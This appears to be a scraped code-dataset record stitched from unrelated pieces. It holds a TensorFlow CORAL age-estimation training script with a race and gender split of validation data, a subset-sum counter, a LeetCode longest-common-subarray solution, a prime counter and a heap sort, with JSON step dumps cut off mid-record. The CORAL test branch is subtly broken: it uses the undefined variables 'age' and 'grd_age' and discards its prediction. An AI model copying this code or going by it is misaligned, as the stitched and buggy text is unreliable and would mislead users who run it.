imp[0:FLAGS.num_classes - 1]\n val_data_name = np.loadtxt(FLAGS.val_txt_path, dtype='<U100',\n skiprows=0, usecols=[0, 1, 2, 3])\n print(len(val_data_name))\n WM_img, WM_age = [], []\n WF_img, WF_age = [], []\n BM_img, BM_age = [], []\n BF_img, BF_age = [], []\n for i in range(len(val_data_name)):\n if val_data_name[i][2] == 'M' and val_data_name[i][3] == 'W':\n WM_img.append(FLAGS.val_img_path + val_data_name[i][0])\n WM_age.append(val_data_name[i][1])\n if val_data_name[i][2] == 'F' and val_data_name[i][3] == 'W':\n WF_img.append(FLAGS.val_img_path + val_data_name[i][0])\n WF_age.append(val_data_name[i][1])\n if val_data_name[i][2] == 'M' and val_data_name[i][3] == 'B':\n BM_img.append(FLAGS.val_img_path + val_data_name[i][0])\n BM_age.append(val_data_name[i][1])\n if val_data_name[i][2] == 'F' and val_data_name[i][3] == 'B':\n BF_img.append(FLAGS.val_img_path + val_data_name[i][0])\n BF_age.append(val_data_name[i][1])\n print(len(WM_img), len(WF_img), len(BM_img), len(BF_img))\n WM_img, WM_age = np.array(WM_img), np.array(WM_age)\n WF_img, WF_age = np.array(WF_img), 
np.array(WF_age)\n BM_img, BM_age = np.array(BM_img), np.array(BM_age)\n BF_img, BF_age = np.array(BF_img), np.array(BF_age)\n all_val_list = [[WM_img, WM_age], [WF_img, WF_age], [BM_img, BM_age\n ], [BF_img, BF_age]]\n batch_idx = len(data_label) // FLAGS.batch_size\n loss_f = open(FLAGS.output_loss_txt, 'w')\n count = 0\n for epoch in range(FLAGS.epochs):\n A = list(zip(data_name, data_label))\n shuffle(A)\n data_name, data_label = zip(*A)\n data_name = np.array(data_name)\n data_label = np.array(data_label)\n data_generator = tf.data.Dataset.from_tensor_slices((data_name,\n data_label))\n data_generator = data_generator.shuffle(len(data_name))\n data_generator = data_generator.map(_func)\n data_generator = data_generator.batch(FLAGS.batch_size)\n data_generator = data_generator.prefetch(tf.data.experimental.\n AUTOTUNE)\n it = iter(data_generator)\n for step in range(batch_idx):\n batch_images, batch_labels, age = next(it)\n levels = make_levels(age)\n total_loss = train_step(train_model, batch_images, levels, imp)\n if count % 10 == 0:\n print('Epoch: {} [{}/{}] loss = {}'.format(epoch + 1, \n step + 1, batch_idx, total_loss))\n if count % 100 == 0:\n test_list = ['WM', 'WF', 'BM', 'BF']\n for j in range(len(all_val_list)):\n val_img, val_lab = all_val_list[j]\n val_data_generator = (tf.data.Dataset.\n from_tensor_slices((val_img, val_lab)))\n val_data_generator = val_data_generator.map(val_func)\n val_data_generator = val_data_generator.batch(1)\n val_data_generator = val_data_generator.prefetch(tf\n .data.experimental.AUTOTUNE)\n val_idx = len(val_img) // 1\n val_it = iter(val_data_generator)\n AE = 0\n for i in range(val_idx):\n img, lab = next(val_it)\n pre_age = test_MAE(train_model, img, lab)\n AE += pre_age\n print('MAE = {} ({})'.format(AE / len(val_img),\n test_list[j]))\n loss_f.write('Epochs: {}, step = {}'.format(epoch,\n count))\n loss_f.write(' --> ')\n loss_f.write(test_list[j])\n loss_f.write(': ')\n loss_f.write(str(AE / len(val_img)))\n loss_f.write(', ')\n loss_f.write('\\n')\n loss_f.flush()\n count += 1\n else:\n data_name = np.loadtxt(FLAGS.test_txt, dtype='<U100', skiprows=0,\n usecols=0)\n data_name = [(FLAGS.test_img + data_name_) for data_name_ in data_name]\n data_label = np.loadtxt(FLAGS.txt_path, dtype=np.float32, skiprows=\n 0, usecols=1)\n data_generator = tf.data.Dataset.from_tensor_slices((data_name,\n data_label))\n data_generator = data_generator.shuffle(len(data_name))\n data_generator = data_generator.map(_func)\n data_generator = data_generator.batch(1)\n data_generator = data_generator.prefetch(tf.data.experimental.AUTOTUNE)\n MAE = 0\n it = iter(data_generator)\n for i in range(FLAGS.n_test):\n image, labels, opp_labels = next(it)\n _, probs = train_model(image, training=False)\n predict = probs > 0.5\n predict = tf.cast(predict, tf.float32)\n pre_age = tf.reduce_sum(predict)\n age = tf.cast(age, tf.float32)\n MAE += tf.reduce_sum(tf.math.abs(grd_age - age))\n if i % 1000 == 0:\n print('{} image(s) for MAE = {}'.format(i + 1, MAE / (i + 1)))\n print('Total MAE = {}'.format(MAE / FLAGS.n_test))\n\n\nif __name__ == '__main__':\n app.run(main)\n",
"step-5": "# -*- coding: utf-8 -*-\n# https://github.com/Raschka-research-group/coral-cnn/tree/master/model-code/resnet34\nfrom absl import flags, app\nfrom Rank_consistent_model_fix import *\nfrom Rank_consistent_model import *\nfrom random import shuffle, random\n\nimport tensorflow as tf\nimport numpy as np\n# import cv2\nimport os\nimport sys\nimport datetime\n\nflags.DEFINE_string('img_path', '/yuwhan/yuwhan/Dataset/[1]Third_dataset/UTK/UTKFace/', 'Image directory')\n\nflags.DEFINE_string('txt_path', '/yuwhan/yuwhan/Dataset/[2]Fourth_dataset/age_banchmark/train_data/UTK/train.txt', 'Text (with label information) directory')\n\nflags.DEFINE_string('val_img_path', '/yuwhan/yuwhan/Dataset/[1]Third_dataset/UTK/UTKFace/', 'Validate image path')\n\nflags.DEFINE_string('val_txt_path', '/yuwhan/yuwhan/Dataset/[2]Fourth_dataset/age_banchmark/train_data/UTK/test.txt', 'Validate text path')\n\nflags.DEFINE_string(\"val_txt_path_2\", \"D:/[1]DB/[1]second_paper_DB/[1]First_fold/_MORPH_MegaAge_16_69_fullDB/[1]Full_DB/testB.txt\", \"Validataion text path\")\n\nflags.DEFINE_integer('img_size', 128, 'Image size')\n\nflags.DEFINE_integer('ch', 3, 'Image channels')\n\nflags.DEFINE_integer('batch_size', 256, 'Train Batch size')\n\nflags.DEFINE_integer(\"val_batch_size\", 128, \"Validation Batch size\")\n\nflags.DEFINE_integer(\"val_batch_size_2\", 128, \"Validation2 batch size\")\n\nflags.DEFINE_integer('num_classes', 48, 'Number of classes')\n\nflags.DEFINE_integer('epochs', 5000, 'Total epochs of training')\n\nflags.DEFINE_float(\"lr\", 5e-5, \"Learning rate\")\n\nflags.DEFINE_string('weights', \"/yuwhan/yuwhan/Projects/[1]Age_related_work_2.x_My_version/Rank-consistent Ordinal Regression for Neural/resnet34_imagenet_1000_no_top.h5\", '')\n\nflags.DEFINE_bool('train', True, 'True or False')\n\nflags.DEFINE_bool('pre_checkpoint', False, 'True or False')\n\nflags.DEFINE_string('pre_checkpoint_path', '', 'Saved checkpoint path')\n\nflags.DEFINE_string('save_checkpoint', '', 'Save checkpoint path')\n\nflags.DEFINE_string(\"graphs\", \"\", \"\")\n\nflags.DEFINE_integer('n_test', 10000, 'Number of test images')\n\nflags.DEFINE_string('test_txt', '', 'Test text(label) path')\n\nflags.DEFINE_string('test_img', '', 'Test images path')\n\nflags.DEFINE_string(\"output_loss_txt\", \"/yuwhan/Edisk/yuwhan/Edisk/4th_paper/age_banchmark/UTK/loss_CORAL.txt\", \"\")\n\nFLAGS = flags.FLAGS\nFLAGS(sys.argv)\n\noptimizer = tf.keras.optimizers.Adam(FLAGS.lr,beta_1=0.9, beta_2=0.99)\n\n\ndef _func(filename, label):\n\n image_string = tf.io.read_file(filename)\n decode_image = tf.image.decode_jpeg(image_string, channels=3)\n decode_image = tf.image.resize(decode_image, [FLAGS.img_size - 8, FLAGS.img_size - 8]) / 255.\n #decode_image = tf.image.random_crop(decode_image, [FLAGS.img_size - 8, FLAGS.img_size - 8, 3])\n\n if random() > 0.5:\n decode_image = tf.image.flip_left_right(decode_image)\n\n #decode_image = tf.image.per_image_standardization(decode_image)\n\n label = label - 16\n one_hot = tf.one_hot(label, FLAGS.num_classes)\n \n return decode_image, one_hot, label\n\ndef val_func(name, label):\n\n image_string = tf.io.read_file(name)\n decode_image = tf.image.decode_jpeg(image_string, channels=3)\n decode_image = tf.image.resize(decode_image, [FLAGS.img_size - 8, FLAGS.img_size - 8]) / 255.\n #decode_image = tf.image.per_image_standardization(decode_image)\n\n label = int(label) - 16\n one_hot = tf.one_hot(label, FLAGS.num_classes) \n \n return decode_image, one_hot\n\n#@tf.function\ndef run_model(model, images):\n 
logits, probs = model(images, training=True)\n return logits, probs\n\[email protected]\ndef train_step(model, images, levels, imp):\n \n with tf.GradientTape() as tape:\n logits, probs = run_model(model, images)\n\n #total_loss = (-tf.reduce_sum((tf.nn.log_softmax(logits, axis=2)[:,:,1]*levels + tf.nn.log_softmax(logits, axis=2)[:,:,0]*(1-levels))*imp, 1))\n \n # total_loss = (-tf.reduce_sum( (tf.math.log_sigmoid(logits)*levels + tf.math.log(1. - tf.nn.sigmoid(logits))*(1-levels))*imp, 1))\n total_loss = (-tf.reduce_sum( (tf.math.log_sigmoid(logits)*levels + (tf.math.log_sigmoid(logits) - logits)*(1-levels))*imp, 1))\n #total_loss = -tf.reduce_sum((tf.math.log(tf.nn.softmax(logits, 2)[:, :, 1] + 1e-7) * levels \\\n # + tf.math.log(tf.nn.softmax(logits, 2)[:, :, 0] + 1e-7) * (1 - levels)) * imp, 1)\n\n total_loss = tf.reduce_mean(total_loss)\n\n gradients = tape.gradient(total_loss, model.trainable_variables)\n optimizer.apply_gradients(zip(gradients, model.trainable_variables))\n return total_loss\n\ndef task_importance_weights(data):\n label = np.array(data).astype(np.float32)\n num_examples = label.size\n\n y = np.unique(label)\n \n m = np.zeros(label.shape)\n\n for i, t in enumerate(np.arange(np.min(y), np.max(y))):\n m_k = np.max([label[label > t].size, \n num_examples - label[label > t].size])\n #print(m_k)\n m_k = tf.cast(tf.convert_to_tensor(m_k), tf.float32)\n m[i] = tf.sqrt(m_k)\n # m[i] = float(m_k)**(0.5)\n\n max_ = np.max(m)\n imp = tf.cast(m / max_, tf.float32)\n #print(imp)\n return imp\n \[email protected]\ndef test_MAE(model, images, labels):\n logits, probs = model(images, training=False)\n predict = probs > 0.5\n predict = tf.cast(predict, tf.float32)\n pre_age = tf.reduce_sum(predict, 1)\n grd_age = tf.argmax(labels, 1) + 1\n grd_age = tf.cast(grd_age, tf.float32)\n AE = tf.reduce_sum(tf.math.abs(grd_age - pre_age))\n return AE\n\ndef make_levels(labels):\n levels = []\n for i in range(FLAGS.batch_size):\n l = [1] * (labels[i].numpy()) + [0]*(FLAGS.num_classes - 1 - labels[i].numpy())\n l = tf.cast(l, tf.float32)\n levels.append(l)\n\n return tf.convert_to_tensor(levels, tf.float32)\n\ndef main(argv=None):\n\n # train_model = resnet_type1(input_shape=(FLAGS.img_size - 8, FLAGS.img_size - 8, 3), NUM_CLASSES=FLAGS.num_classes)\n train_model = ResNet34(input_shape=(FLAGS.img_size - 8, FLAGS.img_size - 8, FLAGS.ch), include_top=False,\n batch_size=FLAGS.batch_size, weight_path=FLAGS.weights, weights='imagenet')\n\n regularizer = tf.keras.regularizers.l2(0.000005)\n initializer = tf.keras.initializers.glorot_normal()\n\n for layer in train_model.layers:\n for attr in ['kernel_regularizer']:\n if hasattr(layer, attr):\n setattr(layer, attr, regularizer)\n # for attr_ in [\"kernel_initializer\"]:\n # if hasattr(layer, attr_):\n # setattr(layer, attr_, initializer)\n\n x = train_model.output\n avgpool = tf.keras.layers.GlobalAveragePooling2D()(x)\n # avgpool = tf.reshape(avgpool, [avgpool.shape[0], -1])\n # fc = tf.keras.layers.Dense(1, use_bias=False)(avgpool)\n\n # logits = Linear(NUM_CLASSES - 1)(fc)\n logits = tf.keras.layers.Dense(FLAGS.num_classes-1, use_bias=False)(avgpool)\n logits = Linear(FLAGS.num_classes - 1)(logits)\n probs = tf.nn.sigmoid(logits)\n\n train_model = tf.keras.Model(inputs=train_model.input, outputs=[logits, probs])\n train_model.summary()\n\n #for m in train_model.layers:\n # if isinstance(m, tf.keras.layers.Conv2D):\n # a = m.output_mask\n # n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels\n # m.weight.data.normal_(0, (2. 
/ n)**.5)\n # elif isinstance(m, tf.keras.layers.BatchNormalization):\n # m.get_weights\n # m.weight.data.fill_(1)\n # m.bias.data.zero_()\n\n if FLAGS.pre_checkpoint is True:\n\n ckpt = tf.train.Checkpoint(train_model=train_model, optimizer=optimizer)\n\n ckpt_manager = tf.train.CheckpointManager(ckpt, FLAGS.pre_checkpoint_path, max_to_keep=5)\n\n # if a checkpoint exists, restore the latest checkpoint.\n if ckpt_manager.latest_checkpoint:\n print(ckpt_manager.latest_checkpoint)\n ckpt.restore(ckpt_manager.latest_checkpoint)\n print ('Latest checkpoint restored!!')\n\n if FLAGS.train == True:\n \n data_name = np.loadtxt(FLAGS.txt_path, dtype='<U100', skiprows=0, usecols=0)\n data_name = [FLAGS.img_path + data_name_ for data_name_ in data_name]\n data_label = np.loadtxt(FLAGS.txt_path, dtype=np.int32, skiprows=0, usecols=1)\n\n imp = task_importance_weights(data_label-16)\n imp = imp[0:FLAGS.num_classes-1]\n\n val_data_name = np.loadtxt(FLAGS.val_txt_path, dtype='<U100', skiprows=0, usecols=[0, 1, 2, 3])\n print(len(val_data_name))\n WM_img, WM_age = [], []\n WF_img, WF_age = [], []\n BM_img, BM_age = [], []\n BF_img, BF_age = [], []\n for i in range(len(val_data_name)):\n\n if val_data_name[i][2] == \"M\" and val_data_name[i][3] == \"W\":\n WM_img.append(FLAGS.val_img_path + val_data_name[i][0])\n WM_age.append(val_data_name[i][1])\n\n if val_data_name[i][2] == \"F\" and val_data_name[i][3] == \"W\":\n WF_img.append(FLAGS.val_img_path + val_data_name[i][0])\n WF_age.append(val_data_name[i][1])\n\n if val_data_name[i][2] == \"M\" and val_data_name[i][3] == \"B\":\n BM_img.append(FLAGS.val_img_path + val_data_name[i][0])\n BM_age.append(val_data_name[i][1])\n\n if val_data_name[i][2] == \"F\" and val_data_name[i][3] == \"B\":\n BF_img.append(FLAGS.val_img_path + val_data_name[i][0])\n BF_age.append(val_data_name[i][1])\n \n print(len(WM_img), len(WF_img), len(BM_img), len(BF_img))\n WM_img, WM_age = np.array(WM_img), np.array(WM_age)\n WF_img, WF_age = np.array(WF_img), np.array(WF_age)\n BM_img, BM_age = np.array(BM_img), np.array(BM_age)\n BF_img, BF_age = np.array(BF_img), np.array(BF_age)\n all_val_list = [[WM_img, WM_age], [WF_img, WF_age], [BM_img, BM_age], [BF_img, BF_age]]\n\n batch_idx = len(data_label) // FLAGS.batch_size\n\n #current_time = datetime.datetime.now().strftime(\"%Y%m%d-%H%M%S\")\n #train_log_dir = FLAGS.graphs + current_time + '/train'\n #val_log_dir = FLAGS.graphs + current_time + '/val'\n #train_summary_writer = tf.summary.create_file_writer(train_log_dir)\n #val_summary_writer = tf.summary.create_file_writer(val_log_dir)\n\n loss_f = open(FLAGS.output_loss_txt, \"w\")\n count = 0\n for epoch in range(FLAGS.epochs):\n\n A = list(zip(data_name, data_label))\n shuffle(A)\n data_name, data_label = zip(*A)\n data_name = np.array(data_name)\n data_label = np.array(data_label)\n\n data_generator = tf.data.Dataset.from_tensor_slices((data_name, data_label))\n data_generator = data_generator.shuffle(len(data_name))\n data_generator = data_generator.map(_func)\n data_generator = data_generator.batch(FLAGS.batch_size)\n data_generator = data_generator.prefetch(tf.data.experimental.AUTOTUNE)\n\n it = iter(data_generator)\n\n #imp = task_importance_weights(data_label)\n #imp = imp[0:FLAGS.num_classes-1]\n for step in range(batch_idx):\n\n batch_images, batch_labels, age = next(it)\n levels = make_levels(age)\n total_loss = train_step(train_model, batch_images, levels, imp)\n\n #with val_summary_writer.as_default():\n # tf.summary.scalar(u'total loss', loss, step=count)\n\n if 
count % 10 == 0:\n #MAE = test_MAE(train_model, batch_images, batch_labels, levels)\n print('Epoch: {} [{}/{}] loss = {}'.format(epoch + 1, step + 1, batch_idx, total_loss))\n\n if count % 100 == 0:\n test_list = [\"WM\", \"WF\", \"BM\", \"BF\"]\n for j in range(len(all_val_list)):\n val_img, val_lab = all_val_list[j]\n\n val_data_generator = tf.data.Dataset.from_tensor_slices((val_img, val_lab))\n val_data_generator = val_data_generator.map(val_func)\n val_data_generator = val_data_generator.batch(1)\n val_data_generator = val_data_generator.prefetch(tf.data.experimental.AUTOTUNE)\n\n val_idx = len(val_img) // 1\n val_it = iter(val_data_generator)\n AE = 0\n\n for i in range(val_idx):\n img, lab = next(val_it)\n pre_age = test_MAE(train_model, img, lab)\n AE += pre_age\n\n print(\"MAE = {} ({})\".format(AE / len(val_img), test_list[j]))\n\n loss_f.write(\"Epochs: {}, step = {}\".format(epoch, count))\n loss_f.write(\" --> \")\n loss_f.write(test_list[j])\n loss_f.write(\": \")\n loss_f.write(str(AE / len(val_img)))\n loss_f.write(\", \")\n\n loss_f.write(\"\\n\")\n loss_f.flush()\n\n\n\n # print(\"==========\")\n # print(\"[2]MAE = {}\".format(MAE))\n # print(\"==========\")\n # model_dir = FLAGS.save_checkpoint\n # folder_name = int((count + 1)/val_idx)\n # folder_name_str = \"%s/%s\" % (model_dir, folder_name)\n # if not os.path.isdir(folder_name_str):\n # print(\"Make {} folder to save checkpoint\".format(folder_name))\n # os.makedirs(folder_name_str)\n # ckpt = tf.train.Checkpoint(train_model=train_model, optimizer=optimizer)\n # checkpoint_dir = folder_name_str + \"/\" + \"CORAL_{}_steps.ckpt\".format(count)\n # ckpt_manager = tf.train.CheckpointManager(ckpt, checkpoint_dir, 5)\n # ckpt_manager.save()\n\n # with val_summary_writer.as_default():\n # tf.summary.scalar(u'[2]MAE', MAE, step=count)\n\n count += 1\n\n else:\n data_name = np.loadtxt(FLAGS.test_txt, dtype='<U100', skiprows=0, usecols=0)\n data_name = [FLAGS.test_img + data_name_ for data_name_ in data_name]\n data_label = np.loadtxt(FLAGS.txt_path, dtype=np.float32, skiprows=0, usecols=1)\n\n data_generator = tf.data.Dataset.from_tensor_slices((data_name, data_label))\n data_generator = data_generator.shuffle(len(data_name))\n data_generator = data_generator.map(_func)\n data_generator = data_generator.batch(1)\n data_generator = data_generator.prefetch(tf.data.experimental.AUTOTUNE)\n\n MAE = 0\n it = iter(data_generator)\n for i in range(FLAGS.n_test):\n\n image, labels, opp_labels = next(it)\n\n _, probs = train_model(image, training=False)\n\n predict = probs > 0.5\n predict = tf.cast(predict, tf.float32)\n pre_age = tf.reduce_sum(predict)\n age = tf.cast(age, tf.float32)\n MAE += tf.reduce_sum(tf.math.abs(grd_age - age))\n\n if i % 1000 == 0:\n print('{} image(s) for MAE = {}'.format(i + 1, MAE / (i + 1)))\n\n print('Total MAE = {}'.format(MAE / FLAGS.n_test))\n\nif __name__ == '__main__':\n app.run(main)\n",
"step-ids": [
7,
8,
9,
10,
12
]
}
|
[
7,
8,
9,
10,
12
] |
import sys
sys.setrecursionlimit(10 ** 6)
n, s = map(int, input().split())
value = list(map(int, input().split()))
count = 0
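# Depth-first enumeration: at each index, either include value[index] in the running sum or skip it.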
def recursive(index, sum):
global count
if index == n:
if sum == s:
count += 1
return
recursive(index + 1, sum + value[index])
recursive(index + 1, sum)
recursive(0, 0)
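# The empty subset also sums to 0, so it is excluded from the count when s == 0.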
if s == 0:
count -= 1
print(count)
|
normal
|
{
"blob_id": "f1aa12ec4ee2482db8abf1121a3443502544e1a2",
"index": 2815,
"step-1": "<mask token>\n\n\ndef recursive(index, sum):\n global count\n if index == n:\n if sum == s:\n count += 1\n return\n recursive(index + 1, sum + value[index])\n recursive(index + 1, sum)\n\n\n<mask token>\n",
"step-2": "<mask token>\nsys.setrecursionlimit(10 ** 6)\n<mask token>\n\n\ndef recursive(index, sum):\n global count\n if index == n:\n if sum == s:\n count += 1\n return\n recursive(index + 1, sum + value[index])\n recursive(index + 1, sum)\n\n\nrecursive(0, 0)\nif s == 0:\n count -= 1\nprint(count)\n",
"step-3": "<mask token>\nsys.setrecursionlimit(10 ** 6)\nn, s = map(int, input().split())\nvalue = list(map(int, input().split()))\ncount = 0\n\n\ndef recursive(index, sum):\n global count\n if index == n:\n if sum == s:\n count += 1\n return\n recursive(index + 1, sum + value[index])\n recursive(index + 1, sum)\n\n\nrecursive(0, 0)\nif s == 0:\n count -= 1\nprint(count)\n",
"step-4": "import sys\nsys.setrecursionlimit(10 ** 6)\nn, s = map(int, input().split())\nvalue = list(map(int, input().split()))\ncount = 0\n\n\ndef recursive(index, sum):\n global count\n if index == n:\n if sum == s:\n count += 1\n return\n recursive(index + 1, sum + value[index])\n recursive(index + 1, sum)\n\n\nrecursive(0, 0)\nif s == 0:\n count -= 1\nprint(count)\n",
"step-5": null,
"step-ids": [
1,
2,
3,
4
]
}
|
[
1,
2,
3,
4
] |
# leetcode 718: Maximum Length of Repeated Subarray
# Given two integer arrays A and B, return the length of the longest subarray that appears in both.
#
# Example 1:
# Input:
# A: [1,2,3,2,1]
# B: [3,2,1,4,7]
# Output: 3
# Explanation:
# The longest common subarray is [3, 2, 1].
#
# Constraints:
# 1 <= len(A), len(B) <= 1000
# 0 <= A[i], B[i] < 100
class Solution:
def findLength(self, A: [int], B: [int])->int:
"""
        Dynamic programming: maintain a table DP of common-subarray lengths.
        DP[i][j] is the length of the longest common subarray ending at A[i] and B[j].
        If A[i] == B[j], DP[i][j] = DP[i-1][j-1] + 1
        If A[i] != B[j], DP[i][j] = 0
        Time complexity: O(mn)
:param A:
:param B:
:return:
"""
na = len(A)
nb = len(B)
        # dp table with na rows and nb columns
dp = [[0 for _ in range(nb)] for _ in range(na)]
for i in range(na):
for j in range(nb):
if A[i] == B[j]:
if i >= 1 and j >= 1:
dp[i][j] = 1 + dp[i-1][j-1]
else:
dp[i][j] = 1
else:
dp[i][j] = 0
max_length = max(max(row) for row in dp)
return max_length
sol = Solution()
la = [0,0,0,0,1]
lb = [1,0,0,0,0]
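# The longest common subarray of la and lb is [0, 0, 0, 0], so this prints 4.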
print(sol.findLength(la, lb))
|
normal
|
{
"blob_id": "b8219c21dc2cdd497d3de48c59c146a1fd1509ec",
"index": 6673,
"step-1": "class Solution:\n <mask token>\n\n\n<mask token>\n",
"step-2": "class Solution:\n\n def findLength(self, A: [int], B: [int]) ->int:\n \"\"\"\n 动态规划, 维护一个公共子串长度表DP\n DP[i][j]表示A中以第i个元素,B中以第j个元素结尾的公共子串长度\n 如果A[i]==B[j], DP[i][j]=DP[i-1][j-1]+1\n 如果A[i]==B[j], DP[i][j]=0\n 时间复杂度为:O(mn)\n :param A:\n :param B:\n :return:\n \"\"\"\n na = len(A)\n nb = len(B)\n dp = [[(0) for _ in range(nb)] for _ in range(na)]\n for i in range(na):\n for j in range(nb):\n if A[i] == B[j]:\n if i >= 1 and j >= 1:\n dp[i][j] = 1 + dp[i - 1][j - 1]\n else:\n dp[i][j] = 1\n else:\n dp[i][j] = 0\n max_length = max(max(row) for row in dp)\n return max_length\n\n\n<mask token>\n",
"step-3": "class Solution:\n\n def findLength(self, A: [int], B: [int]) ->int:\n \"\"\"\n 动态规划, 维护一个公共子串长度表DP\n DP[i][j]表示A中以第i个元素,B中以第j个元素结尾的公共子串长度\n 如果A[i]==B[j], DP[i][j]=DP[i-1][j-1]+1\n 如果A[i]==B[j], DP[i][j]=0\n 时间复杂度为:O(mn)\n :param A:\n :param B:\n :return:\n \"\"\"\n na = len(A)\n nb = len(B)\n dp = [[(0) for _ in range(nb)] for _ in range(na)]\n for i in range(na):\n for j in range(nb):\n if A[i] == B[j]:\n if i >= 1 and j >= 1:\n dp[i][j] = 1 + dp[i - 1][j - 1]\n else:\n dp[i][j] = 1\n else:\n dp[i][j] = 0\n max_length = max(max(row) for row in dp)\n return max_length\n\n\n<mask token>\nprint(sol.findLength(la, lb))\n",
"step-4": "class Solution:\n\n def findLength(self, A: [int], B: [int]) ->int:\n \"\"\"\n 动态规划, 维护一个公共子串长度表DP\n DP[i][j]表示A中以第i个元素,B中以第j个元素结尾的公共子串长度\n 如果A[i]==B[j], DP[i][j]=DP[i-1][j-1]+1\n 如果A[i]==B[j], DP[i][j]=0\n 时间复杂度为:O(mn)\n :param A:\n :param B:\n :return:\n \"\"\"\n na = len(A)\n nb = len(B)\n dp = [[(0) for _ in range(nb)] for _ in range(na)]\n for i in range(na):\n for j in range(nb):\n if A[i] == B[j]:\n if i >= 1 and j >= 1:\n dp[i][j] = 1 + dp[i - 1][j - 1]\n else:\n dp[i][j] = 1\n else:\n dp[i][j] = 0\n max_length = max(max(row) for row in dp)\n return max_length\n\n\nsol = Solution()\nla = [0, 0, 0, 0, 1]\nlb = [1, 0, 0, 0, 0]\nprint(sol.findLength(la, lb))\n",
"step-5": "# leetcode 718 最长重复子数组\n# 给两个整数数组 A 和 B ,返回两个数组中公共的、长度最长的子数组的长度。\n#\n# 示例 1:\n# 输入:\n# A: [1,2,3,2,1]\n# B: [3,2,1,4,7]\n# 输出: 3\n# 解释:\n# 长度最长的公共子数组是 [3, 2, 1]。\n#\n# 说明:\n# 1 <= len(A), len(B) <= 1000\n# 0 <= A[i], B[i] < 100\n\n\nclass Solution:\n def findLength(self, A: [int], B: [int])->int:\n \"\"\"\n 动态规划, 维护一个公共子串长度表DP\n DP[i][j]表示A中以第i个元素,B中以第j个元素结尾的公共子串长度\n 如果A[i]==B[j], DP[i][j]=DP[i-1][j-1]+1\n 如果A[i]==B[j], DP[i][j]=0\n 时间复杂度为:O(mn)\n :param A:\n :param B:\n :return:\n \"\"\"\n na = len(A)\n nb = len(B)\n # na行,nb列的矩阵\n dp = [[0 for _ in range(nb)] for _ in range(na)]\n for i in range(na):\n for j in range(nb):\n if A[i] == B[j]:\n if i >= 1 and j >= 1:\n dp[i][j] = 1 + dp[i-1][j-1]\n else:\n dp[i][j] = 1\n else:\n dp[i][j] = 0\n max_length = max(max(row) for row in dp)\n return max_length\n\n\nsol = Solution()\nla = [0,0,0,0,1]\nlb = [1,0,0,0,0]\nprint(sol.findLength(la, lb))",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
'''Given a range of 2 numbers (i.e) L and R count the number of prime numbers in the range (inclusive of L and R ).
Input Size : L <= R <= 100000(complexity O(n) read about Sieve of Eratosthenes)
Sample Testcase :
INPUT
2 5
OUTPUT
3'''
x, y = map(int, input().split())
count = 0
for i in range(x, y + 1):
    if i > 1:
        for j in range(2, i):
            if i % j == 0:
                break
        else:
            count += 1
print(count)
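# The problem statement mentions the Sieve of Eratosthenes; a commented-out sketch of that
# approach (an alternative to the trial division above, not part of the original submission):
# sieve = [True] * (y + 1)
# sieve[0:2] = [False, False]
# for p in range(2, int(y ** 0.5) + 1):
#     if sieve[p]:
#         sieve[p * p:y + 1:p] = [False] * len(range(p * p, y + 1, p))
# print(sum(sieve[x:y + 1]))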
|
normal
|
{
"blob_id": "06848ec0e327fed1da00446cec6392c6f42130af",
"index": 2158,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nfor i in range(x, y + 1):\n if i > 1:\n for j in range(2, i):\n if i % j == 0:\n break\n else:\n count += 1\nprint(count)\n",
"step-3": "<mask token>\nx, y = map(int, input().split())\ncount = 0\nfor i in range(x, y + 1):\n if i > 1:\n for j in range(2, i):\n if i % j == 0:\n break\n else:\n count += 1\nprint(count)\n",
"step-4": "'''Given a range of 2 numbers (i.e) L and R count the number of prime numbers in the range (inclusive of L and R ).\nInput Size : L <= R <= 100000(complexity O(n) read about Sieve of Eratosthenes)\nSample Testcase :\nINPUT\n2 5\nOUTPUT\n3'''\n\nx,y=map(int,input().split())\ncount=0\nfor i in range(x,y+1):\n if i>1:\n for j in range(2,i):\n if(i%j==0):\n break\n else:\n count+=1\nprint(count)\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
import math
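# In-place heap sort: build a max-heap, then repeatedly move the heap root to the end of the
# array and re-heapify the remainder. O(n log n) time, O(1) extra space.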
def max_heapity(arr, start, end):
root = start
while True:
child = 2 * root + 1
        # Stop once the child index runs past the end of the heap
if child > end:
break
        # Compare the left and right children and pick the larger one
if child + 1 <= end and arr[child] < arr[child + 1]:
child += 1
        # If the root is smaller than that child, swap them (restoring the max-heap property)
if arr[root] < arr[child]:
arr[root], arr[child] = arr[child], arr[root]
root = child
else:
break
def build_max_heap(arr):
n = len(arr)
for start in range(n // 2 - 1, -1, -1):
max_heapity(arr, start, n-1)
def heap_sort(arr):
    # First rearrange the data into a max-heap
build_max_heap(arr)
print("Max Heap:", arr)
    # Swap the first element (the max-heap root) with the last element of the unsorted part,
    # then re-heapify the shrunken unsorted part to restore the max-heap property,
    # repeating until the whole array is sorted.
n = len(arr)
for i in range(n - 1, 0, -1):
arr[0], arr[i] = arr[i], arr[0]
max_heapity(arr, 0, i-1)
if __name__ == "__main__":
data = [38, 14, 57, 59, 52, 19]
print("Original:", data)
heap_sort(data) # heap: [59, 52, 57, 14, 38, 19]
print("Sorted:", data) # [14, 19, 38, 52, 57, 59]
print()
data = [9, 15, 12, 23, 33, 26, 7, 31, 42, 36]
print("original:", data)
heap_sort(data) # [42, 36, 26, 31, 33, 12, 7, 15, 23, 9]
print("Sorted:", data) # [7, 9, 12, 15, 23, 26, 31, 33, 36, 42]
|
normal
|
{
"blob_id": "2ffe4b0eb7af9b3a4d5724442b5409d27bfa92a1",
"index": 6130,
"step-1": "<mask token>\n\n\ndef max_heapity(arr, start, end):\n root = start\n while True:\n child = 2 * root + 1\n if child > end:\n break\n if child + 1 <= end and arr[child] < arr[child + 1]:\n child += 1\n if arr[root] < arr[child]:\n arr[root], arr[child] = arr[child], arr[root]\n root = child\n else:\n break\n\n\ndef build_max_heap(arr):\n n = len(arr)\n for start in range(n // 2 - 1, -1, -1):\n max_heapity(arr, start, n - 1)\n\n\n<mask token>\n",
